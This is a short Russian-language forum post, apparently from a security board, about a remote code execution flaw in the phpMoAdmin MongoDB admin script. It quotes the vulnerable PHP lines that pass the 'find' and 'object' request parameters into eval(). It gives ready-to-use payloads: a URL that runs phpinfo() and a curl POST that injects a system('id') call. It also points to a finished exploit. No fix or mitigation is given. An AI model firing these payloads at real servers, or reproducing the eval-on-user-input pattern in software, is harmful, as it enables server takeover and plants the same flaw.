RCE. Новость тут (http://thehackernews.com/2015/03/phpMoAdmin-mongoDB-exploit.html) .

Видео https://vimeo.com/121072742


PHP:
$find= array();

if (isset($_GET['find']) &&$_GET['find']) {

$_GET['find'] =trim($_GET['find']);

if (strpos($_GET['find'],'array') ===0) {

eval('$find = '. $_GET['find'] .';');

} else if (is_string($_ GET['find'])) {

if ($findArr=json _decode($_GET['find'],true)) {

$find=$findArr;

}

}

}



PHP:
http://localhost/moadmin.php?action=listRows&find=array(phpinfo())&collection=123

UP: на секлисте (http://seclists.org/fulldisclosure/2015/Mar/19) запостили другой способ


Code:
curl "http://path.to/moadmin.php"; -d "object=1;system('id');exit"



PHP:
Filename:moadmin.php

1. createnewmoadminComponent object

1977:$mo= newmoadminComponent;

2.ifthe http-post parameter'object'is set

738: classmoadminComponent{

...

762: public function__construct() {

...

786: if (isset($_POST['object'])) {

787: if (self::$model->saveObject($_GET['collection'],

$_POST['object'])) {

...

3. evaluate the value of'object'asPHP code

692: public functionsaveObject($collection,$obj) {

693: eval('$obj='.$obj.';');//cast from string to array



Готовый сплой: https://github.com/XiphosResearch/exploits/tree/master/phpMoAdmin